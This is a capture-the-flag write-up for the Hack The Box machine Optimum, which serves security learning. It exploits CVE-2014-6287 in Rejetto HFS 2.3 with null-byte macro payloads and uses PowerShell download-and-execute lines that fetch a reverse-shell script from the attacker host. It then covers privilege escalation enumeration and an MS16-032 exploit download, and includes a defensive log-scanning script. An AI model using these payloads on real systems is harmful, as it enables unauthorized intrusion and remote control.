Hack The Box - Optimum

Machine IP: 10.10.10.8

Vulnerabilities:
  - Rejetto HTTP File Server 2.3: CVE-2014-6287 (without Metasploit)

NMAP

▶ nmap -Pn -sS -p- 10.10.10.8 -T4 --min-rate 1000 -oN surface.nmap

Nmap scan report for 10.10.10.8
Host is up (0.18s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http

▶ nmap -sC -sV -p 80 10.10.10.8 -oN deep.nmap

Nmap scan report for 10.10.10.8
Host is up (0.18s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

HTTP #80


HTTP File Server 2.3

  • CVE-2014-6287 : The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aka HFS or HTTP Fileserver) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.

Exploit


Command Execution

▶ tcpdump -i tun0
%00{.exec|ping 10.10.14.21.}

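For the defensive side of the search-action bug above, the following is an added example (not part of the original write-up) that flags CVE-2014-6287 attempts in a web access log: it percent-decodes each request path and looks for a NUL byte followed by an HFS macro opener. It assumes Apache/nginx-style combined log lines; the sample lines are constructed, not captured traffic.

```python
"""Added example: flag HFS 2.3 search requests carrying the CVE-2014-6287
null-byte macro injection in an access log (constructed sample data)."""
import re
from urllib.parse import unquote

# Constructed sample log: one benign search, two injection attempts
# (raw and fully percent-encoded), one ordinary file download.
SAMPLE_LOG = """\
10.10.14.21 - - [01/Jan/2024:10:00:00 +0000] "GET /?search=hello HTTP/1.1" 200 512
10.10.14.21 - - [01/Jan/2024:10:00:01 +0000] "GET /?search=%00{.exec|ping+10.10.14.21.} HTTP/1.1" 200 512
10.10.14.21 - - [01/Jan/2024:10:00:02 +0000] "GET /?search=%00%7B.exec%7Cpowershell.exe.%7D HTTP/1.1" 200 512
10.10.14.21 - - [01/Jan/2024:10:00:03 +0000] "GET /files/report.pdf HTTP/1.1" 200 9001
"""

# Assumed combined-log layout: ip ident user [timestamp] "METHOD path PROTO" ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*"'
)
# The bug: a NUL in the search term cuts findMacroMarker's scan short, so a
# macro written right after it ("{.exec|...}") is not neutralised and is run
# when the page is rendered.  After percent-decoding we therefore look for
# NUL followed by "{." and capture the macro name.
MACRO_RE = re.compile(r"\x00\{\.(?P<macro>[A-Za-z]+)")


def decode_path(path: str) -> str:
    """Percent-decode a request path; '+' is a space inside query strings."""
    return unquote(path.replace("+", " "))


def scan_log(text: str) -> list:
    """Return one dict per request that carries a NUL-prefixed HFS macro."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        found = MACRO_RE.search(decode_path(m["path"]))
        if found:
            hits.append({"ip": m["ip"], "ts": m["ts"],
                         "macro": found["macro"], "request": m["path"]})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} macro={hit["macro"]} {hit["request"]}')
```

Both encoded forms of the payload are caught because matching happens after decoding; HFS's own log format differs from the one assumed here, so adjust LOG_RE before pointing it at real files.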

Reverse Shell (Nishang)

  • Invoke-PowerShellTcp.ps1

    • Copy and paste the line of code to the bottom of the script.

    • Edit the code.

    • Upload the Nishang script.

    • Start a reverse Netcat listener.

%00{.exec|c:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadstring('http://10.10.14.21:8000/Invoke-PowerShellTcp.ps1**w**').}


  • Target system information.
PS C:\Users\kostas\Desktop>systeminfo


Privilege Escalation

WinPEAS

  • Start SMB server.
▶ sudo impacket-smbserver share . -smb2support
  • Copy winPEASx64.exe to Optimum.
▶ copy \\10.10.14.21\share\winPEASx64.exe .


  • Execute winPEASx64.exe.
PS C:\Users\kostas\desktop> ./winPEASx64.exe

No useful information was found.

Sherlock

  • Start a Python HTTP server.
▶ python -m http.server


  • Edit, upload and run Sherlock.ps1.
  • Add the line Find-AllVulns at the end of the script to call this function.


PS C:\Users\kostas\desktop> IEX(New-Object Net.Webclient).downloadString('http://10.10.14.21:8000/Sherlock.ps1')

Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Not Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Appears Vulnerable

Title      : Win32k Elevation of Privilege 
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable

Title      : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID      : 2017-7199
Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable


Searchsploit

▶ searchsploit MS16-032


PowerShell Empire

  • Download Exploit: wget https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-MS16032.ps1

Optional Reference: https://0xdf.gitlab.io/2021/03/17/htb-optimum.html#the-importance-of-architecture